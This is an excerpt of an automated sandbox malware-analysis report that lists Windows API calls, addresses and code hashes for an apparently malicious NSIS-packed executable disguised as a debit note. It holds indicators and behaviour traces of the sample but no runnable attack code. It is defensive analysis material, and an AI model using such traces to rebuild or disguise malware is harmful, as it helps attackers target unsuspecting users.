                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                Memory Dump Source
                                • Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 4216380887-0
                                • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                APIs
                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                • GlobalFree.KERNEL32(?), ref: 10002572
                                • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                APIs
                                • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                • wsprintfW.USER32 ref: 00404A70
                                • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s$&B
                                • API String ID: 3540041739-2907463167
                                • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                Memory Dump Source
                                • Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                • String ID:
                                • API String ID: 1148316912-0
                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401CEB
                                • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                • DeleteObject.GDI32(00000000), ref: 00401D36
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 5757bc3562e7fd28978ac45cc7d9905cf04a78579febaaeea46e845b0a190490
                                • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                • Opcode Fuzzy Hash: 5757bc3562e7fd28978ac45cc7d9905cf04a78579febaaeea46e845b0a190490
                                • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                APIs
                                • GetDC.USER32(?), ref: 00401D44
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectRelease
                                • String ID:
                                • API String ID: 3808545654-0
                                • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                APIs
                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                APIs
                                • CharNextW.USER32(?,?,Antegrade\Fravristelse213.Sto226,?,00405AB2,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405A4C
                                • CharNextW.USER32(00000000), ref: 00405A51
                                • CharNextW.USER32(00000000), ref: 00405A69
                                Strings
                                • Antegrade\Fravristelse213.Sto226, xrefs: 00405A3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CharNext
                                • String ID: Antegrade\Fravristelse213.Sto226
                                • API String ID: 3213498283-844488938
                                • Opcode ID: 21c909a7070704e5dbb7e9601562fce6107f8a8183e885fdad65ddb46c3d8f9e
                                • Instruction ID: 3370e48302fb4b38b4c5194c943d3a4fd1b010f94388a0a3dcc183d660c6baaf
                                • Opcode Fuzzy Hash: 21c909a7070704e5dbb7e9601562fce6107f8a8183e885fdad65ddb46c3d8f9e
                                • Instruction Fuzzy Hash: 2CF09651F10B2295DF3177A44CC5E7B57B8EB58760B04853BE601B72C0E3B84D818F9A
                                APIs
                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00405999
                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 004059A3
                                • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-3355392842
                                • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                APIs
                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                  • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                • String ID:
                                • API String ID: 1404258612-0
                                • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                APIs
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                  • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                  • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                  • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                  • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                  • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                  • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                • String ID:
                                • API String ID: 3585118688-0
                                • Opcode ID: 31d36f602dcab66d188b5b3b2e777ee9953d6626e675800b0e1fc5d87eda0f2f
                                • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                • Opcode Fuzzy Hash: 31d36f602dcab66d188b5b3b2e777ee9953d6626e675800b0e1fc5d87eda0f2f
                                • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                APIs
                                  • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                  • Part of subcall function 00405A3E: CharNextW.USER32(?,?,Antegrade\Fravristelse213.Sto226,?,00405AB2,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405A4C
                                  • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                  • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                • lstrlenW.KERNEL32(Antegrade\Fravristelse213.Sto226,00000000,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405AF4
                                • GetFileAttributesW.KERNEL32(Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,00000000,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0), ref: 00405B04
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                • String ID: Antegrade\Fravristelse213.Sto226
                                • API String ID: 3248276644-844488938
                                • Opcode ID: 7ce201bf88eaf48813c7c66b2d703cb578c55b534477fae0be54905458882fdd
                                • Instruction ID: d8ec0bb6260b8bc6bf9377f80a5ae864fb4799106b1aa2bc96123f944ca7c929
                                • Opcode Fuzzy Hash: 7ce201bf88eaf48813c7c66b2d703cb578c55b534477fae0be54905458882fdd
                                • Instruction Fuzzy Hash: 61F0A425305E5259EA22323A5C85AAF3548CF82364759077FF852B22D2DB3C8D43DDBE
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00405195
                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                  • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                APIs
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                • CloseHandle.KERNEL32(?), ref: 004056F5
                                Strings
                                • Error launching installer, xrefs: 004056D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID: Error launching installer
                                • API String ID: 3712363035-66219284
                                • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                APIs
                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77222EE0,00403861,77223420,0040366C,?), ref: 004038A4
                                • GlobalFree.KERNEL32(?), ref: 004038AB
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
